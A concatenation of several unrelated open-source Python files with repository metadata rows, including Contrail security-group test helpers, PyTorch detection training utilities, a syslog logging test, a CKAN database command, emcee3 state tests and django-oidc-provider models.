subnet_uuid = vn.get_network_ipam_refs()[0]['attr'].\
ipam_subnets[0].subnet_uuid
iip = InstanceIp(name='%s-network%d-iip' % (name, idx))
iip.set_subnet_uuid(subnet_uuid)
iip.set_virtual_machine_interface(vmi)
iip.set_virtual_network(vn)
iip.set_instance_ip_family('v4')
iip.set_instance_ip_address(gw_ip)
self._vnc_lib.instance_ip_create(iip)
iips.append(iip)
self._vnc_lib.logical_router_create(lr)
return lr, vns, vmis, iips
def _security_group_rule_build(self, rule_info, sg_fq_name_str):
protocol = rule_info['protocol']
port_min = rule_info['port_min'] or 0
port_max = rule_info['port_max'] or 65535
direction = rule_info['direction'] or 'ingress'
ip_prefix = rule_info['ip_prefix']
ether_type = rule_info['ether_type']
if ip_prefix:
cidr = ip_prefix.split('/')
pfx = cidr[0]
pfx_len = int(cidr[1])
endpt = [AddressType(subnet=SubnetType(pfx, pfx_len))]
else:
endpt = [AddressType(security_group=sg_fq_name_str)]
local = None
remote = None
if direction == 'ingress':
dir = '>'
local = endpt
remote = [AddressType(security_group='local')]
else:
dir = '>'
remote = endpt
local = [AddressType(security_group='local')]
if not protocol:
protocol = 'any'
if protocol.isdigit():
protocol = int(protocol)
if protocol < 0 or protocol > 255:
raise Exception('SecurityGroupRuleInvalidProtocol-%s' % protocol)
else:
if protocol not in ['any', 'tcp', 'udp', 'icmp', 'icmp6']:
raise Exception('SecurityGroupRuleInvalidProtocol-%s' % protocol)
if not ip_prefix and not sg_fq_name_str:
if not ether_type:
ether_type = 'IPv4'
sgr_uuid = str(uuid.uuid4())
rule = PolicyRuleType(rule_uuid=sgr_uuid, direction=dir,
protocol=protocol,
src_addresses=local,
src_ports=[PortType(0, 65535)],
dst_addresses=remote,
dst_ports=[PortType(port_min, port_max)],
ethertype=ether_type)
return rule
#end _security_group_rule_build
def _security_group_rule_append(self, sg_obj, sg_rule):
rules = sg_obj.get_security_group_entries()
if rules is None:
rules = PolicyEntriesType([sg_rule])
else:
for sgr in rules.get_policy_rule() or []:
sgr_copy = copy.copy(sgr)
sgr_copy.rule_uuid = sg_rule.rule_uuid
if sg_rule == sgr_copy:
raise Exception('SecurityGroupRuleExists %s' % sgr.rule_uuid)
rules.add_policy_rule(sg_rule)
sg_obj.set_security_group_entries(rules)
#end _security_group_rule_append
def _security_group_rule_remove(self, sg_obj, sg_rule):
rules = sg_obj.get_security_group_entries()
if rules is None:
            raise Exception('SecurityGroupRuleNotExists %s' % sg_rule.rule_uuid)
else:
for sgr in rules.get_policy_rule() or []:
if sgr.rule_uuid == sg_rule.rule_uuid:
rules.delete_policy_rule(sgr)
sg_obj.set_security_group_entries(rules)
return
raise Exception('SecurityGroupRuleNotExists %s' % sg_rule.rule_uuid)
    #end _security_group_rule_remove
# end TestCase
class ErrorInterceptingLogger(sandesh_logger.SandeshLogger):
_exceptions = []
_other_errors = []
@classmethod
def register_exception(cls, msg, *args, **kwargs):
if 'traceback' in msg.lower():
cls._exceptions.append((msg, args, kwargs))
return True
return False
@classmethod
def register_error(cls, msg, *args, **kwargs):
if not cls.register_exception(msg, *args, **kwargs):
cls._other_errors.append((msg, args, kwargs))
@classmethod
def get_exceptions(cls):
return list(cls._exceptions)
@classmethod
def get_other_errors(cls):
return list(cls._other_errors)
@classmethod
def reset(cls):
cls._exceptions, cls._other_errors = [], []
@classmethod
def get_qualified_name(cls):
return '{module_name}.{class_name}'.format(
module_name=cls.__module__, class_name=cls.__name__)
class LoggerWrapper(object):
def __init__(self, logger):
self._logger = logger
def __getattr__(self, item):
return getattr(self._logger, item)
def error(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.critical(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.exception(msg, *args, **kwargs)
def log(self, lvl, msg, *args, **kwargs):
ErrorInterceptingLogger.register_exception(
msg, *args, **kwargs)
return self._logger.log(lvl, msg, *args, **kwargs)
def __init__(self, *args, **kwargs):
super(ErrorInterceptingLogger, self).__init__(*args, **kwargs)
self._logger = ErrorInterceptingLogger.LoggerWrapper(
self._logger)
| apache-2.0 | -2,208,394,981,384,609,800 | 37.410698 | 121 | 0.594897 | false |
pytorch/vision | references/detection/utils.py | 1 | 8671 | from collections import defaultdict, deque
import datetime
import errno
import os
import time
import torch
import torch.distributed as dist
class SmoothedValue(object):
"""Track a series of values and provide access to smoothed values over a
window or the global series average.
"""
def __init__(self, window_size=20, fmt=None):
if fmt is None:
fmt = "{median:.4f} ({global_avg:.4f})"
self.deque = deque(maxlen=window_size)
self.total = 0.0
self.count = 0
self.fmt = fmt
def update(self, value, n=1):
self.deque.append(value)
self.count += n
self.total += value * n
def synchronize_between_processes(self):
"""
Warning: does not synchronize the deque!
"""
if not is_dist_avail_and_initialized():
return
t = torch.tensor([self.count, self.total], dtype=torch.float64, device='cuda')
dist.barrier()
dist.all_reduce(t)
t = t.tolist()
self.count = int(t[0])
self.total = t[1]
@property
def median(self):
d = torch.tensor(list(self.deque))
return d.median().item()
@property
def avg(self):
d = torch.tensor(list(self.deque), dtype=torch.float32)
return d.mean().item()
@property
def global_avg(self):
return self.total / self.count
@property
def max(self):
return max(self.deque)
@property
def value(self):
return self.deque[-1]
def __str__(self):
return self.fmt.format(
median=self.median,
avg=self.avg,
global_avg=self.global_avg,
max=self.max,
value=self.value)
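# Minimal usage sketch (not part of the original module, added for
# illustration): SmoothedValue keeps the last `window_size` values in a deque
# for windowed statistics (median/avg), while `total`/`count` track the global
# average across every update.
def _smoothed_value_example():
    tracker = SmoothedValue(window_size=3, fmt="{avg:.2f}")
    for v in [1.0, 2.0, 3.0, 4.0]:
        tracker.update(v)
    # The window holds [2.0, 3.0, 4.0] -> avg 3.0; global_avg over all four
    # updates is 2.5.
    return tracker.avg, tracker.global_avg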
def all_gather(data):
"""
Run all_gather on arbitrary picklable data (not necessarily tensors)
Args:
data: any picklable object
Returns:
list[data]: list of data gathered from each rank
"""
world_size = get_world_size()
if world_size == 1:
return [data]
data_list = [None] * world_size
dist.all_gather_object(data_list, data)
return data_list
def reduce_dict(input_dict, average=True):
"""
Args:
input_dict (dict): all the values will be reduced
average (bool): whether to do average or sum
Reduce the values in the dictionary from all processes so that all processes
have the averaged results. Returns a dict with the same fields as
input_dict, after reduction.
"""
world_size = get_world_size()
if world_size < 2:
return input_dict
with torch.no_grad():
names = []
values = []
# sort the keys so that they are consistent across processes
for k in sorted(input_dict.keys()):
names.append(k)
values.append(input_dict[k])
values = torch.stack(values, dim=0)
dist.all_reduce(values)
if average:
values /= world_size
reduced_dict = {k: v for k, v in zip(names, values)}
return reduced_dict
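# Usage sketch (not part of the original module, added for illustration): with
# a single process (world_size == 1) reduce_dict returns its input unchanged;
# under torch.distributed it averages every value across ranks so all
# processes log the same loss numbers. The loss names below are placeholders.
def _reduce_dict_example():
    loss_dict = {"loss_classifier": torch.tensor(0.7),
                 "loss_box_reg": torch.tensor(0.3)}
    loss_dict_reduced = reduce_dict(loss_dict, average=True)
    losses_reduced = sum(loss for loss in loss_dict_reduced.values())
    return loss_dict_reduced, losses_reduced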
class MetricLogger(object):
def __init__(self, delimiter="\t"):
self.meters = defaultdict(SmoothedValue)
self.delimiter = delimiter
def update(self, **kwargs):
for k, v in kwargs.items():
if isinstance(v, torch.Tensor):
v = v.item()
assert isinstance(v, (float, int))
self.meters[k].update(v)
def __getattr__(self, attr):
if attr in self.meters:
return self.meters[attr]
if attr in self.__dict__:
return self.__dict__[attr]
raise AttributeError("'{}' object has no attribute '{}'".format(
type(self).__name__, attr))
def __str__(self):
loss_str = []
for name, meter in self.meters.items():
loss_str.append(
"{}: {}".format(name, str(meter))
)
return self.delimiter.join(loss_str)
def synchronize_between_processes(self):
for meter in self.meters.values():
meter.synchronize_between_processes()
def add_meter(self, name, meter):
self.meters[name] = meter
def log_every(self, iterable, print_freq, header=None):
i = 0
if not header:
header = ''
start_time = time.time()
end = time.time()
iter_time = SmoothedValue(fmt='{avg:.4f}')
data_time = SmoothedValue(fmt='{avg:.4f}')
space_fmt = ':' + str(len(str(len(iterable)))) + 'd'
if torch.cuda.is_available():
log_msg = self.delimiter.join([
header,
'[{0' + space_fmt + '}/{1}]',
'eta: {eta}',
'{meters}',
'time: {time}',
'data: {data}',
'max mem: {memory:.0f}'
])
else:
log_msg = self.delimiter.join([
header,
'[{0' + space_fmt + '}/{1}]',
'eta: {eta}',
'{meters}',
'time: {time}',
'data: {data}'
])
MB = 1024.0 * 1024.0
for obj in iterable:
data_time.update(time.time() - end)
yield obj
iter_time.update(time.time() - end)
if i % print_freq == 0 or i == len(iterable) - 1:
eta_seconds = iter_time.global_avg * (len(iterable) - i)
eta_string = str(datetime.timedelta(seconds=int(eta_seconds)))
if torch.cuda.is_available():
print(log_msg.format(
i, len(iterable), eta=eta_string,
meters=str(self),
time=str(iter_time), data=str(data_time),
memory=torch.cuda.max_memory_allocated() / MB))
else:
print(log_msg.format(
i, len(iterable), eta=eta_string,
meters=str(self),
time=str(iter_time), data=str(data_time)))
i += 1
end = time.time()
total_time = time.time() - start_time
total_time_str = str(datetime.timedelta(seconds=int(total_time)))
print('{} Total time: {} ({:.4f} s / it)'.format(
header, total_time_str, total_time / len(iterable)))
def collate_fn(batch):
return tuple(zip(*batch))
def warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor):
def f(x):
if x >= warmup_iters:
return 1
alpha = float(x) / warmup_iters
return warmup_factor * (1 - alpha) + alpha
return torch.optim.lr_scheduler.LambdaLR(optimizer, f)
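# Sketch of the warmup behaviour (not part of the original module, added for
# illustration): during the first `warmup_iters` steps the LR multiplier ramps
# linearly from `warmup_factor` up to 1.0 and stays at 1.0 afterwards. The
# single-parameter optimizer is a placeholder used only to build the scheduler.
def _warmup_lr_scheduler_example():
    params = [torch.nn.Parameter(torch.zeros(1))]
    optimizer = torch.optim.SGD(params, lr=0.02)
    scheduler = warmup_lr_scheduler(optimizer, warmup_iters=1000,
                                    warmup_factor=1.0 / 1000)
    # Multiplier is 0.001 at step 0, ~0.5 at step 500, and 1.0 from step 1000.
    return scheduler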
def mkdir(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def setup_for_distributed(is_master):
"""
This function disables printing when not in master process
"""
import builtins as __builtin__
builtin_print = __builtin__.print
def print(*args, **kwargs):
force = kwargs.pop('force', False)
if is_master or force:
builtin_print(*args, **kwargs)
__builtin__.print = print
def is_dist_avail_and_initialized():
if not dist.is_available():
return False
if not dist.is_initialized():
return False
return True
def get_world_size():
if not is_dist_avail_and_initialized():
return 1
return dist.get_world_size()
def get_rank():
if not is_dist_avail_and_initialized():
return 0
return dist.get_rank()
def is_main_process():
return get_rank() == 0
def save_on_master(*args, **kwargs):
if is_main_process():
torch.save(*args, **kwargs)
def init_distributed_mode(args):
if 'RANK' in os.environ and 'WORLD_SIZE' in os.environ:
args.rank = int(os.environ["RANK"])
args.world_size = int(os.environ['WORLD_SIZE'])
args.gpu = int(os.environ['LOCAL_RANK'])
elif 'SLURM_PROCID' in os.environ:
args.rank = int(os.environ['SLURM_PROCID'])
args.gpu = args.rank % torch.cuda.device_count()
else:
print('Not using distributed mode')
args.distributed = False
return
args.distributed = True
torch.cuda.set_device(args.gpu)
args.dist_backend = 'nccl'
print('| distributed init (rank {}): {}'.format(
args.rank, args.dist_url), flush=True)
torch.distributed.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
torch.distributed.barrier()
setup_for_distributed(args.rank == 0)
| bsd-3-clause | -5,394,417,501,050,074,000 | 28.39322 | 94 | 0.548149 | false |
LowieHuyghe/edmunds | tests/log/drivers/testsyslog.py | 1 | 2970 |
from tests.testcase import TestCase
from tests.foundation.syslogserver import SysLogServer
class TestSysLog(TestCase):
"""
Test the SysLog
"""
def set_up(self):
"""
Set up the test case
"""
super(TestSysLog, self).set_up()
self._server = SysLogServer()
self._server.start()
def tear_down(self):
"""
Tear down the test case
"""
super(TestSysLog, self).tear_down()
self._server.stop()
def test_sys_log(self):
"""
Test the sys log
"""
info_string = 'info_%s' % self.rand_str(20)
warning_string = 'warning_%s' % self.rand_str(20)
error_string = 'error_%s' % self.rand_str(20)
# Write config
self.write_config([
"from edmunds.log.drivers.syslog import SysLog \n",
"from logging.handlers import SysLogHandler \n",
"from logging import WARNING \n",
"APP = { \n",
" 'debug': False, \n",
" 'log': { \n",
" 'enabled': True, \n",
" 'instances': [ \n",
" { \n",
" 'name': 'syslog',\n",
" 'driver': SysLog,\n",
" 'level': WARNING,\n",
" 'address': ('%s', %i),\n" % (self._server.host, self._server.port),
" 'facility': SysLogHandler.LOG_USER,\n",
" 'socktype': None,\n",
" 'format': '%(message)s',\n",
" }, \n",
" { \n",
" 'name': 'syslog2',\n",
" 'driver': SysLog,\n",
" 'level': WARNING,\n",
" 'address': ('%s', %i),\n" % (self._server.host, self._server.port),
" }, \n",
" ], \n",
" }, \n",
"} \n",
])
# Create app
app = self.create_application()
# Add route
rule = '/' + self.rand_str(20)
@app.route(rule)
def handle_route():
app.logger.info(info_string)
app.logger.warning(warning_string)
app.logger.error(error_string)
return ''
with app.test_client() as c:
# Check syslog
self.assert_not_in(info_string, '\n'.join(self._server.get_data()))
self.assert_not_in(warning_string, '\n'.join(self._server.get_data()))
self.assert_not_in(error_string, '\n'.join(self._server.get_data()))
# Call route
c.get(rule)
# Check syslog
self.assert_not_in(info_string, '\n'.join(self._server.get_data()))
self.assert_in(warning_string, '\n'.join(self._server.get_data()))
self.assert_in(error_string, '\n'.join(self._server.get_data()))
| apache-2.0 | 7,226,208,718,824,647,000 | 30.595745 | 95 | 0.437037 | false |
yhteentoimivuuspalvelut/ckanext-ytp-request | ckanext/ytp/request/command.py | 1 | 1325 | import logging
from ckan.lib.cli import CkanCommand
class InitDBCommand(CkanCommand):
"""
Initialises the database with the required tables
Connects to the CKAN database and creates the member request tables
Usage:
paster initdb
            - Creates the member request database tables
"""
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def __init__(self, name):
super(InitDBCommand, self).__init__(name)
def command(self):
"""
Parse command line arguments and call appropriate method.
"""
# if not self.args or self.args[0] in ['--help', '-h', 'help']:
# print self.usage
# sys.exit(1)
# cmd = self.args[0]
self._load_config()
# Initialise logger after the config is loaded, so it is not disabled.
self.log = logging.getLogger(__name__)
# if cmd == 'initdb':
import ckan.model as model
model.Session.remove()
model.Session.configure(bind=model.meta.engine)
import ckanext.ytp.request.model as rmodel
self.log.info("Initializing tables")
rmodel.init_tables()
self.log.info("DB tables are setup")
# else:
# self.log.error('Command %s not recognized' % (cmd,))
| agpl-3.0 | -445,495,278,592,315,600 | 26.604167 | 78 | 0.587925 | false |
dfm/emcee3 | emcee3/tests/unit/test_state.py | 1 | 1654 | # -*- coding: utf-8 -*-
from __future__ import division, print_function
import numpy as np
from ...state import State
__all__ = ["test_dtype", "test_serialization", "test_repr"]
def test_dtype(seed=1234):
np.random.seed(seed)
dtype = [
("coords", np.float64, (4, )),
("log_prior", np.float64),
("log_likelihood", np.float64),
("accepted", bool)
]
coords = np.random.randn(4)
state = State(coords)
assert state.dtype == np.dtype(dtype)
state = State(coords, face=10.0, blah=6, _hidden=None)
dtype += [
("blah", int),
("face", float),
]
assert state.dtype == np.dtype(dtype)
state = State(coords, face=10.0, blah=6, _hidden=None,
matrix=np.ones((3, 1)))
dtype += [
("matrix", float, (3, 1)),
]
assert state.dtype == np.dtype(dtype)
state = State(coords, face=10.0, blah=6, _hidden=None,
matrix=np.ones((3, 1)), vector=np.zeros(3))
dtype += [
("vector", float, (3,)),
]
assert state.dtype == np.dtype(dtype)
def test_serialization(seed=1234):
np.random.seed(seed)
coords = np.random.randn(4)
state = State(coords, 0.0, -1.5, True, face="blah")
array = state.to_array()
assert np.allclose(array["coords"], coords)
new_state = State.from_array(array)
assert state == new_state
def test_repr():
coords = np.zeros(1)
lnp = 0.0
lnl = -1.5
state = State(coords, lnp, lnl, True)
assert (
repr(state) ==
"State(array({0}), log_prior={1}, log_likelihood={2}, accepted=True)"
.format(coords, lnp, lnl)
)
| mit | 8,939,081,856,143,124,000 | 23.686567 | 77 | 0.555623 | false |
allenai/document-qa | docqa/nn/span_prediction_ops.py | 1 | 4078 | import tensorflow as tf
import numpy as np
"""
Some utility functions for dealing with span prediction in tensorflow
"""
def best_span_from_bounds(start_logits, end_logits, bound=None):
"""
Brute force approach to finding the best span from start/end logits in tensorflow, still usually
    faster than the python dynamic-programming version
"""
b = tf.shape(start_logits)[0]
# Using `top_k` to get the index and value at once is faster
    # than using argmax and then gather to get the value
top_k = tf.nn.top_k(start_logits + end_logits, k=1)
values, indices = [tf.squeeze(x, axis=[1]) for x in top_k]
# Convert to (start_position, length) format
indices = tf.stack([indices, tf.fill((b,), 0)], axis=1)
# TODO Might be better to build the batch x n_word x n_word
# matrix and use tf.matrix_band to zero out the unwanted ones...
if bound is None:
n_lengths = tf.shape(start_logits)[1]
else:
# take the min in case the bound > the context
n_lengths = tf.minimum(bound, tf.shape(start_logits)[1])
def compute(i, values, indices):
top_k = tf.nn.top_k(start_logits[:, :-i] + end_logits[:, i:])
b_values, b_indices = [tf.squeeze(x, axis=[1]) for x in top_k]
b_indices = tf.stack([b_indices, tf.fill((b, ), i)], axis=1)
indices = tf.where(b_values > values, b_indices, indices)
values = tf.maximum(values, b_values)
return i+1, values, indices
_, values, indices = tf.while_loop(
lambda ix, values, indices: ix < n_lengths,
compute,
[1, values, indices],
back_prop=False)
spans = tf.stack([indices[:, 0], indices[:, 0] + indices[:, 1]], axis=1)
return spans, values
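# Usage sketch (not part of the original module, added for illustration):
# given per-token start/end logits of shape (batch, n_tokens), the function
# returns, per example, the (start, end) pair maximizing
# start_logit[start] + end_logit[end] subject to end - start < bound.
def _best_span_from_bounds_example():
    start_logits = tf.constant([[0.1, 2.0, 0.3, 0.0]])
    end_logits = tf.constant([[0.0, 0.5, 3.0, 0.1]])
    spans, scores = best_span_from_bounds(start_logits, end_logits, bound=4)
    # Here the best span is (1, 2) with score 2.0 + 3.0 = 5.0.
    return spans, scores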
def packed_span_f1_mask(spans, l, bound):
starts = []
ends = []
for i in range(bound):
s = tf.range(0, l - i, dtype=tf.int32)
starts.append(s)
ends.append(s + i)
starts = tf.concat(starts, axis=0)
ends = tf.concat(ends, axis=0)
starts = tf.tile(tf.expand_dims(starts, 0), [tf.shape(spans)[0], 1])
ends = tf.tile(tf.expand_dims(ends, 0), [tf.shape(spans)[0], 1])
pred_len = tf.cast(ends - starts + 1, tf.float32)
span_start = tf.maximum(starts, spans[:, 0:1])
span_stop = tf.minimum(ends, spans[:, 1:2])
overlap_len = tf.cast(span_stop - span_start + 1, tf.float32)
true_len = tf.cast(spans[:, 1:2] - spans[:, 0:1] + 1, tf.float32)
p = overlap_len / pred_len
r = overlap_len / true_len
return tf.where(overlap_len > 0, 2 * p * r / (p + r), tf.zeros(tf.shape(starts)))
def to_packed_coordinates(spans, l, bound=None):
""" Converts the spans to vector of packed coordiantes, in the packed format
spans are indexed first by length, then by start position. If bound is given
spans are truncated to be of `bound` length """
lens = spans[:, 1] - spans[:, 0]
if bound is not None:
lens = tf.minimum(lens, bound-1)
return spans[:, 0] + l * lens - lens * (lens - 1) // 2
def to_packed_coordinates_np(spans, l, bound=None):
""" Converts the spans to vector of packed coordiantes, in the packed format
spans are indexed first by length, then by start position in a flattened array.
If bound is given spans are truncated to be of `bound` length """
lens = spans[:, 1] - spans[:, 0]
if bound is not None:
lens = np.minimum(lens, bound-1)
return spans[:, 0] + l * lens - lens * (lens - 1) // 2
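# Worked example of the packed layout (not part of the original module, added
# for illustration): for a context of length l, all spans of length 1 come
# first (indexed by start), then spans of length 2, and so on, so a span
# (start, end) packs to start + l*len - len*(len - 1)//2 with len = end - start.
# For l = 5: (2, 2) -> 2, (0, 1) -> 5 and (3, 4) -> 8; to_unpacked_coordinates
# below inverts this mapping.
def _packed_coordinates_example():
    spans = np.array([[2, 2], [0, 1], [3, 4]])
    return to_packed_coordinates_np(spans, 5)  # -> array([2, 5, 8])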
def to_unpacked_coordinates(ix, l, bound):
ix = tf.cast(ix, tf.int32)
# You can actually compute the lens in closed form:
# lens = tf.floor(0.5 * (-tf.sqrt(4 * tf.square(l) + 4 * l - 8 * ix + 1) + 2 * l + 1))
# but it is very ugly and rounding errors could cause problems, so this approach seems safer
lens = []
for i in range(bound):
lens.append(tf.fill((l - i,), i))
lens = tf.concat(lens, axis=0)
lens = tf.gather(lens, ix)
answer_start = ix - l * lens + lens * (lens - 1) // 2
return tf.stack([answer_start, answer_start+lens], axis=1)
| apache-2.0 | 2,821,853,730,584,280,600 | 36.072727 | 100 | 0.615498 | false |
bunnyinc/django-oidc-provider | oidc_provider/models.py | 1 | 6596 | # -*- coding: utf-8 -*-
import base64
import binascii
from hashlib import md5, sha256
import json
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
CLIENT_TYPE_CHOICES = [
('confidential', 'Confidential'),
('public', 'Public'),
]
RESPONSE_TYPE_CHOICES = [
('code', 'code (Authorization Code Flow)'),
('id_token', 'id_token (Implicit Flow)'),
('id_token token', 'id_token token (Implicit Flow)'),
('code token', 'code token (Hybrid Flow)'),
('code id_token', 'code id_token (Hybrid Flow)'),
('code id_token token', 'code id_token token (Hybrid Flow)'),
]
JWT_ALGS = [
('HS256', 'HS256'),
('RS256', 'RS256'),
]
class Client(models.Model):
name = models.CharField(max_length=100, default='', verbose_name=_(u'Name'))
client_type = models.CharField(max_length=30, choices=CLIENT_TYPE_CHOICES, default='confidential', verbose_name=_(u'Client Type'), help_text=_(u'<b>Confidential</b> clients are capable of maintaining the confidentiality of their credentials. <b>Public</b> clients are incapable.'))
client_id = models.CharField(max_length=255, unique=True, verbose_name=_(u'Client ID'))
client_secret = models.CharField(max_length=255, blank=True, verbose_name=_(u'Client SECRET'))
response_type = models.CharField(max_length=30, choices=RESPONSE_TYPE_CHOICES, verbose_name=_(u'Response Type'))
jwt_alg = models.CharField(max_length=10, choices=JWT_ALGS, default='RS256', verbose_name=_(u'JWT Algorithm'), help_text=_(u'Algorithm used to encode ID Tokens.'))
date_created = models.DateField(auto_now_add=True, verbose_name=_(u'Date Created'))
website_url = models.CharField(max_length=255, blank=True, default='', verbose_name=_(u'Website URL'))
terms_url = models.CharField(max_length=255, blank=True, default='', verbose_name=_(u'Terms URL'), help_text=_(u'External reference to the privacy policy of the client.'))
contact_email = models.CharField(max_length=255, blank=True, default='', verbose_name=_(u'Contact Email'))
logo = models.FileField(blank=True, default='', upload_to='oidc_provider/clients', verbose_name=_(u'Logo Image'))
_redirect_uris = models.TextField(default='', verbose_name=_(u'Redirect URIs'), help_text=_(u'Enter each URI on a new line.'))
def redirect_uris():
def fget(self):
return self._redirect_uris.splitlines()
def fset(self, value):
self._redirect_uris = '\n'.join(value)
return locals()
redirect_uris = property(**redirect_uris())
_post_logout_redirect_uris = models.TextField(blank=True, default='', verbose_name=_(u'Post Logout Redirect URIs'), help_text=_(u'Enter each URI on a new line.'))
def post_logout_redirect_uris():
def fget(self):
return self._post_logout_redirect_uris.splitlines()
def fset(self, value):
self._post_logout_redirect_uris = '\n'.join(value)
return locals()
post_logout_redirect_uris = property(**post_logout_redirect_uris())
class Meta:
verbose_name = _(u'Client')
verbose_name_plural = _(u'Clients')
def __str__(self):
return u'{0}'.format(self.name)
def __unicode__(self):
return self.__str__()
@property
def default_redirect_uri(self):
return self.redirect_uris[0] if self.redirect_uris else ''
class BaseCodeTokenModel(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_(u'User'))
client = models.ForeignKey(Client, verbose_name=_(u'Client'))
expires_at = models.DateTimeField(verbose_name=_(u'Expiration Date'))
_scope = models.TextField(default='', verbose_name=_(u'Scopes'))
def scope():
def fget(self):
return self._scope.split()
def fset(self, value):
self._scope = ' '.join(value)
return locals()
scope = property(**scope())
def has_expired(self):
return timezone.now() >= self.expires_at
def __str__(self):
return u'{0} - {1}'.format(self.client, self.user.email)
def __unicode__(self):
return self.__str__()
class Meta:
abstract = True
class Code(BaseCodeTokenModel):
code = models.CharField(max_length=255, unique=True, verbose_name=_(u'Code'))
nonce = models.CharField(max_length=255, blank=True, default='', verbose_name=_(u'Nonce'))
is_authentication = models.BooleanField(default=False, verbose_name=_(u'Is Authentication?'))
code_challenge = models.CharField(max_length=255, null=True, verbose_name=_(u'Code Challenge'))
code_challenge_method = models.CharField(max_length=255, null=True, verbose_name=_(u'Code Challenge Method'))
class Meta:
verbose_name = _(u'Authorization Code')
verbose_name_plural = _(u'Authorization Codes')
class Token(BaseCodeTokenModel):
access_token = models.CharField(max_length=255, unique=True, verbose_name=_(u'Access Token'))
refresh_token = models.CharField(max_length=255, unique=True, verbose_name=_(u'Refresh Token'))
_id_token = models.TextField(verbose_name=_(u'ID Token'))
def id_token():
def fget(self):
return json.loads(self._id_token)
def fset(self, value):
self._id_token = json.dumps(value)
return locals()
id_token = property(**id_token())
class Meta:
verbose_name = _(u'Token')
verbose_name_plural = _(u'Tokens')
@property
def at_hash(self):
# @@@ d-o-p only supports 256 bits (change this if that changes)
hashed_access_token = sha256(
self.access_token.encode('ascii')
).hexdigest().encode('ascii')
return base64.urlsafe_b64encode(
binascii.unhexlify(
hashed_access_token[:len(hashed_access_token) // 2]
)
).rstrip(b'=').decode('ascii')
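    # Illustrative note (not part of the original model): per OpenID Connect
    # Core, at_hash is the base64url encoding (padding stripped) of the
    # left-most half of the access token's hash; this implementation fixes the
    # hash to SHA-256. The hexdigest/unhexlify round trip above is equivalent
    # to the shorter sketch below:
    #
    #     digest = sha256(self.access_token.encode('ascii')).digest()
    #     at_hash = base64.urlsafe_b64encode(digest[:len(digest) // 2])
    #     return at_hash.rstrip(b'=').decode('ascii')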
class UserConsent(BaseCodeTokenModel):
date_given = models.DateTimeField(verbose_name=_(u'Date Given'))
class Meta:
unique_together = ('user', 'client')
class RSAKey(models.Model):
key = models.TextField(verbose_name=_(u'Key'), help_text=_(u'Paste your private RSA Key here.'))
class Meta:
verbose_name = _(u'RSA Key')
verbose_name_plural = _(u'RSA Keys')
def __str__(self):
return u'{0}'.format(self.kid)
def __unicode__(self):
return self.__str__()
@property
def kid(self):
return u'{0}'.format(md5(self.key.encode('utf-8')).hexdigest() if self.key else '')
| mit | -7,244,896,210,937,017,000 | 35.043716 | 285 | 0.642359 | false |